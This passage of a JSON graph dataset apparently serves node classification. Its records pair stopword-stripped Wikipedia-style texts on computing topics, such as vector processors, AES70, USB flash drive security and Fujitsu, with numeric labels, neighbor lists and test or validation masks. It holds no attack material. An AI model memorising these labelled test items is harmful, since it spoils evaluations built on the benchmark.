revealing plans release apple new programming language swift open-source project september 2015 demoed 3d touch new iphone 6s wwdc 2016 federighi introduced ios 10 macos 10.12 sierra said 15-year-old os x would rebranded macos tune naming scheme used ios tvos watchos emphasized use widgets ios lock screen announced new apis siri imessage would open developers apple special event september 2017 federighi faced controversy initially failing properly demo face id feature iphone x. consequently people became skeptical reliability face id apple stated prior event apple employees inadvertently triggered face id one demonstration phones causing prompt passcode federighi attempted unlock it..",
    "neighbors": [
      10755,
      9732,
      1549,
      7697,
      11289,
      6186,
      6700,
      1074,
      8754,
      9778,
      9784,
      8253,
      576,
      8783,
      4180,
      10838,
      6234,
      3681,
      9826,
      5733,
      8806,
      3691,
      2676,
      6264,
      7806,
      6783,
      2686,
      10878,
      8842,
      10386,
      5784,
      1177,
      4251,
      2207,
      11430,
      171,
      2735,
      3248,
      4283,
      7869,
      713,
      3790,
      7378,
      3286,
      9430,
      3293,
      4318,
      231,
      2282,
      1772,
      4844,
      8441,
      2819,
      1290,
      9999,
      784,
      4888,
      10023,
      4399,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      2388,
      6495,
      9063,
      10602,
      3948,
      1389,
      11118,
      11629,
      10608,
      9589,
      6023,
      6539,
      1428,
      6554,
      3483,
      2979,
      11173,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      464,
      6608,
      8662,
      9174,
      7133,
      9182,
      4068,
      5093,
      2023,
      8170,
      7154,
      5619,
      11257,
      6654,
      511
    ],
    "mask": "None"
  },
  {
    "node_id": 9124,
    "label": 8,
    "text": "WebMethods_Integration_Server:webmethods integration server webmethods integration server one core application servers webmethods platform java-based multiplatform enterprise integration server supports integration diverse services mapping data formats communication systems integration server may also known core webmethods enterprise service bus integration server supports java c/c++ programming languages writing services well proprietary graphical language known flow also supports graphical configuration 3rd party system operations via concept adapter services integration server exposes administration configuration auditing facilities user via html web interface programming languages protocols/standards core protocols/standards additional packages following list significant releases webmethods integration server webmethods integration server certified run following platforms application server runs top java 1.4.x version 6.x 1.7.x version 9.5 1.8.x version 9.10 integration server installation product via webmethods installer program webmethods acquired software ag",
    "neighbors": [
      7364,
      3558,
      5612,
      5677,
      10413,
      7983,
      9909,
      502,
      10486,
      10236,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 9125,
    "label": 8,
    "text": "Hiawatha_(web_server):hiawatha web server hiawatha web server available multiple platforms developed hugo leisink since 2002 hiawatha started january 2002 small web server suitable servers old hardware leisink computer science student time initially created server support internet servers student houses delft south holland netherlands server designed improved security focus leisink states lot security features hiawatha wo n't find webserver author said know long time vulnerabilities exist web servers one thing bothers runtime cgi cgi process web servers run forever single cgi script dos webserver system administrator needed kill script client hacker keeps guessing passwords http authentication kind issues inspired create hiawatha settings maximum request sending time maximum cgi run time client banning etc features opinion every daemon january 2009 edition linux magazine included article hiawatha web server describing light web server good performance innovative security functions hiawatha frequently cited lightweight alternative apache prioritizes easy installation reduced storage including many additional features february 2019 leisink simultaneously announced release version 10.9 end major development pair blog posts hiawatha web server implements important functions modern web server hiawatha many security features web server like preventing sql-injection cross-site scripting xss cross-site request forgery csrf prevention denial-of-service protection control external image linking banning potential hackers limiting runtime cgi applications author worked rfc3546 support openssl documentation subject extremely poor progress difficult although rfc3546 support included since v8.6 version developed polarsslv1.2 although security main focus hiawatha users also speak highly speed performance according performance test carried independent researcher saltwaterc hiawatha faster ten servers tested drupal static content performing comparably rest metrics hiawatha supports load-balanced fastcgi php-fastcgi utility although latter deprecated replaced php project fastcgi process manager php-fpm makes fast scalable handling dynamic content",
    "neighbors": [
      1920,
      899,
      4485,
      7430,
      6797,
      4878,
      7567,
      7695,
      1937,
      9229,
      7443,
      788,
      1556,
      5397,
      1304,
      8350,
      7457,
      3746,
      8994,
      2596,
      3237,
      2470,
      11682,
      7338,
      9387,
      44,
      11693,
      7983,
      10800,
      11439,
      2485,
      1206,
      823,
      5433,
      6714,
      5819,
      10622,
      1991,
      4561,
      11134,
      595,
      1363,
      4439,
      3545,
      5470,
      225,
      865,
      1250,
      2404,
      4837,
      4198,
      6379,
      5612,
      9580,
      2287,
      11376,
      8691,
      10611,
      502,
      11386,
      2045,
      3966
    ],
    "mask": "None"
  },
  {
    "node_id": 9126,
    "label": 3,
    "text": "Vector_processor:vector processor computing vector processor array processor central processing unit cpu implements instruction set containing instructions operate one-dimensional arrays data called vectors compared scalar processors whose instructions operate single data items vector processors greatly improve performance certain workloads notably numerical simulation similar tasks vector machines appeared early 1970s dominated supercomputer design 1970s 1990s notably various cray platforms rapid fall price-to-performance ratio conventional microprocessor designs led vector supercomputer demise later 1990s cpu designs include multiple instructions vector processing multiple vectorised data sets typically known mimd multiple instruction multiple data realized vliw long instruction word fujitsu fr-v vliw/ vector processor combines technologies vector processing development began early 1960s westinghouse solomon project solomon goal dramatically increase math performance using large number simple math co-processors control single master cpu cpu fed single common instruction arithmetic logic units alus one per cycle different data point one work allowed solomon machine apply single algorithm large data set fed form array 1962 westinghouse cancelled project effort restarted university illinois illiac iv version design originally called 1 gflops machine 256 alus finally delivered 1972 64 alus could reach 100 150 mflops nevertheless showed basic concept sound used data-intensive applications computational fluid dynamics illiac fastest machine world illiac approach using separate alus data element common later designs often referred separate category massively parallel computing computer operations functions presented developed kartsev 1967 first successful implementation vector processing appears control data corporation star-100 texas instruments advanced scientific computer asc basic asc i.e. one pipe alu used pipeline architecture supported scalar vector computations peak performance reaching approximately 20 mflops readily achieved processing long vectors expanded alu configurations supported two pipes four pipes corresponding 2x 4x performance gain memory bandwidth sufficient support expanded modes star otherwise slower cdc supercomputers like cdc 7600 data related tasks could keep much smaller less expensive however machine also took considerable time decoding vector instructions getting ready run process required specific data sets work actually sped anything vector technique first fully exploited 1976 famous cray-1 instead leaving data memory like star asc cray design eight vector registers held sixty-four 64-bit words vector instructions applied registers much faster talking main memory cray design used pipeline parallelism implement vector instructions rather multiple alus addition design completely separate pipelines different instructions example addition/subtraction implemented different hardware multiplication allowed batch vector instructions pipelined technique called vector chaining cray-1 normally performance 80 mflops three chains running could peak 240 mflops – far faster machine era examples followed control data corporation tried re-enter high-end market eta-10 machine sold poorly took opportunity leave supercomputing field entirely early mid-1980s japanese companies fujitsu hitachi nippon electric corporation nec introduced register-based vector machines similar cray-1 typically slightly faster much smaller oregon-based floating point systems fps built add-on array processors minicomputers later building minisupercomputers throughout cray continued performance leader continually beating competition series machines led cray-2 cray x-mp cray y-mp since supercomputer market focused much massively parallel processing rather better implementations vector processors however recognising benefits vector processing ibm developed virtual vector architecture use supercomputers coupling several scalar processors act vector processor although vector supercomputers resembling cray-1 less popular days nec continued make type computer present day sx series computers recently sx-aurora tsubasa places processor either 24 48 gigabytes memory hbm 2 module within card physically resembles graphics coprocessor instead serving co-processor main computer pc-compatible computer plugged serving support functions modern graphics processing units gpus include array shader pipelines may driven compute kernels considered vector processors using similar strategy hiding memory latencies general terms cpus able manipulate one two pieces data time instance cpus instruction essentially says add b put result c data b c could be—in theory least—encoded directly instruction however efficient implementation things rarely simple data rarely sent raw form instead pointed passing address memory location holds data decoding address getting data memory takes time cpu traditionally would sit idle waiting requested data show cpu speeds increased memory latency historically become large impediment performance see memory wall order reduce amount time consumed steps modern cpus use technique known instruction pipelining instructions pass several sub-units turn first sub-unit reads address decodes next fetches values addresses next math pipelining trick start decoding next instruction even first left cpu fashion assembly line address decoder constantly use particular instruction takes amount time complete time known latency cpu process entire batch operations much faster efficiently one time vector processors take concept one step instead pipelining instructions also pipeline data processor fed instructions say add b add numbers numbers instead constantly decode instructions fetch data needed complete processor reads single instruction memory simply implied definition instruction instruction operate another item data address one increment larger last allows significant savings decoding time illustrate difference make consider simple task adding two groups 10 numbers together normal programming language one would write loop picked pairs numbers turn added cpu would look something like vector processor task looks considerably different several savings inherent approach one two address translations needed depending architecture represent significant savings another saving fetching decoding instruction done one time instead ten code also smaller lead efficient memory use vector processor may multiple functional units adding numbers parallel checking dependencies numbers required vector instruction specifies multiple independent operations simplifies control logic required improve performance avoiding stalls mentioned earlier cray implementations took step allowing several different types operations carried time consider code adds two numbers multiplies third cray would fetched added multiplied single operation using pseudocode cray math operations thus completed far faster overall limiting factor time required fetch data memory problems attacked sort solution including types instructions necessarily adds complexity core cpu complexity typically makes instructions run slower—i.e. whenever adding many numbers row complex instructions also add complexity decoders might slow decoding common instructions normal adding fact vector processors work best large amounts data worked reason sorts cpus found primarily supercomputers supercomputers general found places weather prediction centers physics labs huge amounts data crunched let r vector speed ratio f vectorization ratio time taken vector unit add array 64 numbers 10 times faster equivalent scalar counterpart r 10 also total number operations program 100 10 scalar vectorization f 0.9 i.e. 90 work done vector unit follows achievable speed formula_1 even performance vector unit high formula_2 get speedup less formula_3 suggests ratio f crucial performance ratio depends efficiency compilation like adjacency elements memory various machines designed include traditional processors vector processors fujitsu ap1000 ap3000 programming heterogeneous machines difficult since developing programs make best use characteristics different processors increases programmer burden increases code complexity decreases portability code requiring hardware specific code interleaved throughout application code balancing application workload across processors problematic especially given typically different performance characteristics different conceptual models deal problem example using coordination language program building blocks programming libraries higher order functions block different native implementation processor type users simply program using abstractions intelligent compiler chooses best implementation based context",
    "neighbors": [
      4098,
      7173,
      9739,
      9741,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      6184,
      10285,
      3630,
      6705,
      7218,
      3123,
      2620,
      2623,
      2113,
      7234,
      3142,
      1614,
      2638,
      6738,
      9302,
      2140,
      1122,
      4194,
      10340,
      3175,
      5223,
      6248,
      8810,
      2155,
      5739,
      4205,
      8815,
      1137,
      630,
      6774,
      8822,
      7802,
      6268,
      3197,
      643,
      6799,
      10383,
      7313,
      8851,
      155,
      6815,
      8352,
      5793,
      2210,
      6818,
      6821,
      5798,
      6311,
      7852,
      9391,
      2224,
      2226,
      7858,
      4276,
      9911,
      8890,
      2237,
      4286,
      2241,
      2243,
      9932,
      5326,
      5329,
      4308,
      10966,
      2264,
      731,
      11487,
      9445,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      1784,
      249,
      9976,
      3323,
      8700,
      6909,
      8447,
      9472,
      1798,
      7432,
      1801,
      9212,
      6926,
      6415,
      785,
      1298,
      11539,
      2838,
      7963,
      2339,
      6950,
      2345,
      4909,
      3886,
      10543,
      306,
      309,
      8501,
      5948,
      7998,
      4928,
      833,
      8514,
      5956,
      4423,
      7497,
      330,
      1866,
      6476,
      8523,
      2383,
      6479,
      7505,
      9044,
      11604,
      344,
      2394,
      859,
      8543,
      1376,
      11618,
      3431,
      1387,
      10603,
      11630,
      4465,
      6004,
      10612,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      9126,
      936,
      10669,
      1967,
      2480,
      8624,
      9137,
      10675,
      1461,
      1463,
      6072,
      7607,
      8120,
      8125,
      4030,
      8126,
      1985,
      453,
      3014,
      1480,
      3025,
      466,
      2008,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      7142,
      2536,
      4587,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 9127,
    "label": 5,
    "text": "Open_Control_Architecture:open control architecture open control architecture oca communications protocol architecture control monitoring connection management networked audio video devices networks referred media networks official specification oca audio engineering society aes standard known aes70-2015 aes70 document use newer term aes70 refer standard architecture specifies aes70 open standard may used freely without licenses fees organization memberships aes70 intended support media networks combine devices diverse manufacturers targeted professional applications aes70 suitable media networks 2 10,000 devices including networks mission-critical and/or life-safety roles aes70 device control monitoring connection management provide transport media program material however aes70 designed work virtually media transport scheme application requires aes70 parts separable may used independently example device may implement aes70 connection management use means operational control monitoring aes70 termed architecture provides basis definition multiple control protocols protocols share common programming model vary signalling detail depending form underlying data transport mechanism aes70 application use whichever aes70 protocol appropriate communications method available oca architecture aes70 developed oca alliance trade association beginning 2011 oca based existing control protocol named ocp created bosch communications systems 2009 2010 ocp turn based embryonic control protocol standard named aes-24 developed aes early 1990s outset intention involved oca rendered open public standard alliance completed oca development fall 2014 transferred specification aes rendering formal standard aes70 formal standard published january 4 2016 today oca alliance works develop enhance functionality aes70 promote aes70 adoption throughout professional media systems industry alliance promotes understanding adoption aes70 facilitates creation aes70 implementations related tools technologies develops future functional enhancements aes70 standard aes70 defines control interface media device presents network connected thus aes70 concerned representation device functions systematic way control monitoring functions via well-defined family protocols media networks normally include one devices called controllers user interfaces allow humans control monitor audio and/or video functioning networked devices aes70-compliant networks controllers use aes70 protocols communicate devices control aes70 defines control protocol used controllers devices scope extend cover design construction controllers user interfaces aes70 intended used professional applications technical requirements applications detailed elsewhere oca scope excludes applications homes automobiles consumer areas aes70 device model canonical description control interface aes70-compliant device presents network aes70 device model object-oriented defines required optional set objects oca objects device control interface implements using aes70 protocol controllers may access properties objects perform control monitoring connection management operations oca objects abstractions represent device control monitoring points media connections may may correspond actual programming objects hardware components inside device device correctly implements aes70 protocol aes70-compliant aes70 define may accomplished generally speaking aes70 device model tends differ device models control architectures several ways aes70 class structure defines set classes oca classes devices may use instantiate oca objects three kinds classes oca classes may broadly grouped three functional sets noted aes70 architecture supports multiple protocols depending nature network medium used present aes70 defines one protocol named ocp.1 ocp.1 aes70 protocol tcp/ip networks future plans include ocp.2 byte-serial version usb networks bluetooth connections point-to-point links ocp.3 text version json aes70 protocol defines three kinds messages follows aes70 control repertoire covers control monitoring connection management audio devices future versions expand audio control repertoire may address video devices well aes70 includes features allow manufacturers extend oca class structure address functions standard repertoire extensions may public confidential manufacturer chooses table 1 summarizes aes70-2015 control repertoire although aes70 provide media transport functions designed interface modern media transport standards control signal routing connection setup functions interface network directory/discovery services capacity aes70 provides useful level abstraction applications allowing controllers devices use one common software model managing stream connections various transport architectures oca alliance defines recommended practices interfacing aes70 various well-known media transport architectures specification interfacing aes70 given media transport scheme called aes70 adaptation aes70 includes architectural solution problems control grouping i.e use single control input effect multiple operating parameters example control grouping master gain control covering multiple device channels one devices control grouping poses difficult problems especially systems given operating parameter may affected multiple control groups example stereophonic multiway sound system gain left-channel high-frequency amplifier may affected settings master controls overall high-frequency level b left-channel level c overall level entire system systems machine intelligence required manage cumulative settings effects lead overrange underrange parameter values aes70 grouping mechanism provides basis management one many devices aes70 includes powerful general mechanism applying storing recalling uploading downloading sets operating parameter values partial full snapshots supported aes70 includes complete support managing configurations reconfigurable dsp devices i.e software-based devices whose signal processing topologies defined redefined runtime external controllers devices aes70 supports creation configuration deletion signal processing elements internal signal paths connect aes70 designed support proprietary extensions maximum compatibility manufacturers may define extensions control repertoire coexist peacefully standard elements aes70 devices controllers continue interoperate aes70 evolves years devices use various versions oca generally intermixable one media network without problems aes70 protocols offer encryption authentication options allow construction secure control monitoring networks completely secure media networks require encryption transmitted program content well mechanisms encryption lie outside scope ocaaes70 although aes70 may used configure control aes70 defines primitives allow reliable update device firmware network primitives may used maintenance software ensure incomplete firmware updates render critical devices networks inoperative aes70 open license-free standard may freely used products manufacturers choose although aes70 nurtured promoted oca alliance membership alliance required order use aes70 aes70 documents available audio engineering society aes standards store standard three parts two significant appendices follows 1 aes70 framework 2 aes70 class structure 3 aes70 protocols two appendices listed universal modeling language uml specifications uml files two forms oca alliance non-profit corporation originally formed secure standardization oca publication aes70 standard 2016 alliance ’ purposes evolved alliance members large small companies desire steer evolution aes70 benefit exchange technology business information trade association provide new members always welcome number development tools open source code available helps start developing aes70 compatible products",
    "neighbors": [
      5472,
      7361,
      10924
    ],
    "mask": "None"
  },
  {
    "node_id": 9128,
    "label": 9,
    "text": "Common_Lisp_Interface_Manager:common lisp interface manager common lisp interface manager clim common lisp-based programming interface creating user interfaces i.e. graphical user interfaces guis fully object-oriented programming user interface management system using common lisp object system clos based idea stream input output also facilities output device independence descended gui system dynamic windows symbolics lisp machines main development 1988 1993 clim 2.0 released 1993 clim designed portable across different common lisp implementations different windowing systems uses reflective architecture window system interface clim supports like dynamic windows so-called presentations clim available allegro cl lispworks macintosh common lisp symbolics genera free software implementation clim named mcclim several extensions clim used several applications like climacs emacs-like editor also provides mouse-sensitive lisp listener read–eval–print loop repl common lisp",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      9245,
      8226,
      2603,
      5165,
      5677,
      3119,
      3631,
      2105,
      6201,
      3132,
      6717,
      576,
      8258,
      8771,
      1613,
      9299,
      10841,
      3675,
      2658,
      7267,
      2660,
      8293,
      3176,
      2666,
      2667,
      5743,
      8303,
      2673,
      8304,
      5751,
      9848,
      5754,
      7292,
      7805,
      1664,
      1666,
      2181,
      1159,
      9865,
      6797,
      9877,
      3734,
      4777,
      4779,
      5803,
      2225,
      11442,
      8883,
      692,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      4822,
      9943,
      7896,
      9434,
      5852,
      8414,
      10463,
      7392,
      7904,
      11488,
      10470,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      10480,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      9491,
      1812,
      1301,
      10012,
      3869,
      2335,
      2849,
      3876,
      11559,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      1347,
      1348,
      8524,
      3408,
      6994,
      1365,
      2392,
      6493,
      10083,
      6502,
      11625,
      8554,
      9579,
      5492,
      3446,
      10104,
      377,
      4992,
      2438,
      3462,
      8582,
      7562,
      6556,
      10654,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      8618,
      7616,
      5569,
      6594,
      8644,
      4550,
      7629,
      11218,
      10712,
      3034,
      479,
      3051,
      5611,
      5612,
      7670,
      11255,
      2045,
      4606
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9129,
    "label": 6,
    "text": "USB_flash_drive_security:usb flash drive security secure usb flash drives protect data stored access unauthorized users usb flash drive products market since 2000 use increasing exponentially consumers businesses increased demand drives manufacturers producing faster devices greater data storage capacities increasing number portable devices used business laptops notebooks personal digital assistants pda smartphones usb flash drives mobile devices companies particular risk sensitive data stored unsecured usb flash drives employees use devices transport data outside office consequences losing drives loaded information significant including loss customer data financial information business plans confidential information associated risk reputation damage usb flash drives pose two major challenges information system security data leakage owing small size ubiquity system compromise infections computer viruses malware spyware large storage capacity usb flash drives relative small size low cost means using data storage without adequate operational logical controls may pose serious threat information availability confidentiality integrity following factors taken consideration securing important assets average cost data breach source necessarily flash drive ranges less 100,000 2.5 million sandisk survey characterized data corporate end users frequently copy examples security breaches resulting usb drives include early days computer viruses malware spyware primary means transmission infection floppy disk today usb flash drives perform data software storage transfer role floppy disk often used transfer files computers may different networks different offices owned different people made usb flash drives leading form information system infection piece malware gets onto usb flash drive may infect devices drive subsequently plugged prevalence malware infection means usb flash drive documented 2011 microsoft study analyzing data 600 million systems worldwide first half 2011 study found 26 percent malware infections windows system due usb flash drives exploiting autorun feature microsoft windows finding line statistics monthly reporting commonly detected malware antivirus company eset lists abuse autorun.inf first among top ten threats 2011 windows autorun.inf file contains information programs meant run automatically removable media often usb flash drives similar devices accessed windows pc user default autorun setting windows versions prior windows 7 automatically run program listed autorun.inf file access many kinds removable media many types malware copy removable storage devices always program ’ primary distribution mechanism malware authors often build additional infection techniques examples malware spread usb flash drives include since security physical drive guaranteed without compromising benefits portability security measures primarily devoted making data compromised drive inaccessible unauthorized users unauthorized processes may executed malware one common approach encrypt data storage routinely scan usb flash drives computer viruses malware spyware antivirus program although methods possible software solutions bitlocker diskcryptor popular veracrypt allow contents usb drive encrypted automatically transparently also windows 7 enterprise windows 7 ultimate windows server 2008 r2 provide usb drive encryption using bitlocker go apple computer mac os x operating system provided software disc data encryption since mac os x panther issued 2003 see also disk utility additional software installed external usb drive prevent access files case drive becomes lost stolen installing software company computers may help track minimize risk recording interactions usb drive computer storing centralized database usb drives utilize hardware encryption microchips within usb drive provide automatic transparent encryption manufacturers offer drives require pin code entered physical keypad device allowing access drive cost usb drives significant starting fall due type usb drive gaining popularity hardware systems may offer additional features ability automatically overwrite contents drive wrong password entered certain number times type functionality provided software system since encrypted data simply copied drive however form hardware security result data loss activated accidentally legitimate users strong encryption algorithms essentially make functionality redundant encryption keys used hardware encryption typically never stored computer memory technically hardware solutions less subject cold boot attacks software-based systems reality however cold boot attacks pose little threat assuming basic rudimentary security precautions taken software-based systems security encrypted flash drives constantly tested individual hackers well professional security firms times january 2010 flash drives positioned secure found poorly designed provide little actual security giving access data without knowledge correct password flash drives compromised claimed fixed include companies reacted immediately kingston offered replacement drives different security architecture sandisk verbatim trek released patches commercial environments secure usb drives used central/remote management system may provide organizations additional level asset control significantly reducing risks harmful data breach include initial user deployment ongoing management password recovery data backup remote tracking sensitive data termination issued secure usb drives management systems available software service saas internet connectivity allowed behind-the-firewall solutions",
    "neighbors": [
      3843,
      5764,
      3880,
      1801,
      6797,
      10385,
      7515,
      467,
      9460,
      8471,
      10392,
      7739,
      1083,
      6494
    ],
    "mask": "Test"
  },
  {
    "node_id": 9130,
    "label": 9,
    "text": "PowerBuilder_Foundation_Classes:powerbuilder foundation classes powerbuilder foundation class library pfc set powerbuilder objects customized used develop class libraries objects used provide corporate departmental application consistency pfc also includes objects used utility purposes debugging pfc written powerbuilder delivered powerbuilder objects supporting powerscript source code uses advanced powerbuilder object oriented coding techniques features service-oriented design ensures application uses minimum amount computer resources library initially developed powersoft introduced powerbuilder 5 released library later open sourced sybase powerbuilder 10 released since couple forks occurred including one specifically support appeon web enabling tool powerbuilder sr. vendor product architecture",
    "neighbors": [
      1856
    ],
    "mask": "Test"
  },
  {
    "node_id": 9131,
    "label": 5,
    "text": "RTP_audio_video_profile:rtp audio video profile rtp audio/video profile rtp/avp profile real-time transport protocol rtp specifies technical parameters audio video streams rtp specifies general-purpose data format n't specify encoded data utilize features rtp payload type value put rtp header sampling rate clock rate rate rtp timestamp increments use etc. rtp profile specifies details rtp audio/video profile specifies mapping specific audio video codecs sampling rates rtp payload types clock rates encode data format rtp data payload well specifying describe mappings using session description protocol sdp rfc 3551 lists details payload format reference details provided payload identifiers 96–127 used payloads defined dynamically session document recommends dynamically assigned port numbers although port numbers 5004 5005 registered use profile dynamically assigned port required standard also describes process registering new payload types iana applications operating profile always support pcmu payload type 0 previously dvi4 payload type 5 also recommended recommendation removed august 2013 rfc 7007 many rtp deployments support dvi4 little reason use much modern codecs available",
    "neighbors": [
      7681,
      9665,
      9381,
      9769,
      10444,
      7407,
      5843,
      10271
    ],
    "mask": "None"
  },
  {
    "node_id": 9132,
    "label": 3,
    "text": "Sunway_SW26010:sunway sw26010 sw26010 260-core manycore processor designed national high performance integrated circuit design center shanghai implements sunway architecture 64-bit reduced instruction set computing risc architecture designed china sw26010 four clusters 64 compute-processing elements cpes arranged eight-by-eight array cpes support single instruction multiple data simd instructions capable performing eight double-precision floating-point operations per cycle cluster accompanied conventional general-purpose core called management processing element mpe provides supervisory functions cluster dedicated ddr3 sdram controller memory bank address space processor runs clock speed 1.45 ghz cpe cores feature 64 kb scratchpad memory data 16 kb instructions communicate via network chip instead traditional cache hierarchy mpe traditional setup 32 kb l1 instruction data caches 256 kb l2 cache finally on-chip network connects single system interconnection interface connects chip outside world sw26010 used sunway taihulight supercomputer march june 2018 world fastest supercomputer ranked top500 project system uses 40,960 sw26010s obtain 93.01 pflops linpack benchmark",
    "neighbors": [
      6311,
      1480,
      8523,
      4269,
      9391,
      7699,
      407,
      9851,
      5598
    ],
    "mask": "Test"
  },
  {
    "node_id": 9133,
    "label": 9,
    "text": "FreeMat:freemat freemat free open-source numerical computing environment programming language similar matlab gnu octave addition supporting many matlab functions idl functionality features codeless interface external c c++ fortran code parallel distributed algorithm development via mpi plotting 3d visualization capabilities community support takes place moderated google groups",
    "neighbors": [
      7301,
      5129,
      3980,
      6797,
      15,
      8079,
      5148,
      7580,
      7326,
      7341,
      7983,
      6962,
      823,
      6718,
      2242,
      5830,
      5703,
      8262,
      5833,
      477,
      11239,
      4840,
      363,
      5612,
      5741,
      7148,
      3960,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9134,
    "label": 4,
    "text": "Paper_key:paper key paper key machine-readable print cryptographic key printed key used decrypt data e.g archives backup data paper key result offline private key protocol offline private key also function token two-factor authentication idea digital key decrypt recover sensitive personal data long-term durability stored computer network length secure cryptographic keys restricts memorization secret key takes form 2d barcode machine-readable print early implementations paper key company safeberg use data matrix barcode human-readable base 16 digits user stores printed key secure location avoid abuse key used combination ‘ normal ’ password user extract key creating digital photo scan paper key feeding cryptographic software extracts key decrypt data br",
    "neighbors": [
      7433,
      7434,
      3366,
      10711
    ],
    "mask": "None"
  },
  {
    "node_id": 9135,
    "label": 3,
    "text": "SCO–SGI_code_dispute_of_2003:sco–sgi code dispute 2003 sco forum 2003 sco group sco showed several examples allegedly illegal copying copyrighted code linux open source community quickly debunked examples shown particular one example showed code unix indeed used sgi linux contributions linux maintainers stated code question fact already removed linux example revealed — infringing code question needlessly duplicated functions already present linux sgi analysts also responded matter confirmed code question never infringed sco forum held august 17 – 19 2003 sco publicly showed several alleged examples illegal copying copyright code linux time examples available people signed nda prohibited revealing information shown sco claimed infringements divided four separate categories literal copying obfuscation derivative works non-literal transfers example used sco demonstrate literal copying also known atemalloc example name original contributor revealed sco quick analysis code question pointed sgi time also revealed code already removed linux kernel duplicated already existing functions within hours open source community started several different analyses infringing code results analyses differ slightly confirm code question derived unix code analyses also pointed code could possibly originated unix necessarily prove infringement copyrights community determined particularly bad example code question never used mainstream distributions linux present ia-64 version relative sparseness worldwide ia-64 installations combined limited time code present linux makes chance actually encountering system running code slim possible code contributed linux originated unix system v original implementation happened early 1970s comparison original unix source code unix system v source reveal substantial differences two fact dennis ritchie one creators original versions unix acknowledged either ken thompson wrote original code unix system v code derived important original versions unix copyright claim source code time law required copyright claims effectively means early unix code protected copyright law additionally santa cruz operation sco group released source code early versions unix 4-clause bsd-like license allowing use source code open source products october 1 2003 sgi responded sco ’ allegations open letter linux community letter rich altmaier vice president software claims small code fragments indeed inadvertently included linux kernel",
    "neighbors": [
      11232,
      10051,
      7204,
      9320,
      9135,
      2995,
      823,
      2584,
      3323,
      7134
    ],
    "mask": "Test"
  },
  {
    "node_id": 9136,
    "label": 7,
    "text": "MashApps:mashapps mashapps process-centric cloud applications small medium enterprises departmental deployments mashapps used solve different types business problems within enterprise integrations third party applications on-premises on-demand systems modeled without much dependency team mashup applications shared users organizations users looking mashapps business scenarios either build look similar solutions readily available google apps marketplace mashapps built online mashup enabler called mashapp composer building mashapp require programming languages like enterprise mashup markup language new mashapps assembled existing repository reusable mashup components like process library external web services",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 9137,
    "label": 7,
    "text": "Fujitsu:fujitsu fujitsu chiefly makes computing products company subsidiaries also offer diversity products services areas personal computing enterprise computing including x86 sparc mainframe compatible server products well storage products telecommunications advanced microelectronics air conditioning approximately 140,000 employees products services available 100 countries fujitsu listed tokyo stock exchange constituent nikkei 225 topix indices fujitsu second oldest company ibm hewlett packard established june 20 1935 name spin-off fuji electric company joint venture furukawa electric company german conglomerate siemens founded 1923 despite connections furukawa zaibatsu fujitsu escaped allied occupation japan second world war mostly unscathed 1954 fujitsu manufactured japan first computer facom 100 mainframe 1961 launched second generation computers transitorized facom 222 mainframe 1968 facom230 5 series marked beginning third generation computers fujitsu offered mainframe computers 1955 least 2002 fujitsu computer products included minicomputers small business computers servers personal computers 1955 fujitsu founded kawasaki frontale company football club kawasaki frontale j league football club since 1999 1967 company name officially changed contraction since 1985 company also fields company american football team fujitsu frontiers play corporate x-league appeared 7 japan x bowls winning two winning two rice bowls 1971 fujitsu signed oem agreement canadian company consolidated computers limited ccl distribute ccl data entry product key-edit fujitsu joined icl earlier began marketing key-edit british commonwealth countries well western eastern europe ccl direct marketing staff canada usa london uk frankfurt mers kutt inventor key-edit founder ccl common thread led fujitsu ’ later association icl gene amdahl 1986 fujitsu queen university belfast business incubation unit qubis ltd established joint venture called kainos privately held software company based belfast northern ireland 1990 fujitsu acquired 80 uk-based computer company international computers limited icl 1.29 billion icl renamed fujitsu services 2002 september 1990 fujitsu announced launch new series mainframe computers time fastest world july 1991 fujitsu acquired half russian company kme-cs kazan manufacturing enterprise computer systems 1992 fujitsu introduced world first 21-inch full-color plasma display hybrid based upon plasma display created university illinois urbana-champaign nhk strl achieving superior brightness 1993 fujitsu formed flash memory manufacturing joint venture amd spansion part transaction amd contributed flash memory group fab 25 texas r facilities assembly plants thailand malaysia china fujitsu provided flash memory business division malaysian fujitsu microelectronics final assembly test operations february 1989 mid-1997 fujitsu built fm towns pc variant started proprietary pc variant intended multimedia applications computer games later became compatible regular pcs 1993 fm towns marty released gaming console compatible fm towns games fujitsu agreed acquire 58 percent amdahl corporation including canada-based dmr consulting group already around 850 million july 1997 april 1997 company acquired 30 percent stake glovia international inc. el segundo calif. manufacturing erp software provider whose software begun integrating electronics plants starting 1994 june 1999 fujitsu historical connection siemens revived two companies agreed merge european computer operations new 50:50 joint venture called fujitsu siemens computers became world fifth-largest computer manufacturing company april 2000 fujitsu acquired remaining 70 glovia international april 2002 icl re-branded fujitsu march 2 2004 fujitsu computer products america lost class action lawsuit hard disk drives defective chips firmware october 2004 fujitsu acquired australian subsidiary atos origin systems implementation company around 140 employees specialized sap august 2007 fujitsu signed £500 million 10-year deal reuters group reuters outsourced majority internal department fujitsu part agreement around 300 reuters staff 200 contractors transferred fujitsu october 2007 fujitsu announced would establishing offshore development centre noida india capacity house 1,200 employees investment us 10 million october 2007 fujitsu australia new zealand subsidiary acquired infinity solutions ltd new zealand-based hardware services consultancy company undisclosed amount january 2009 fujitsu reached agreement sell hdd business toshiba transfer business completed october 1 2009 march 2009 fujitsu announced decided convert fdk corporation time equity-method affiliate consolidated subsidiary may 1 2009 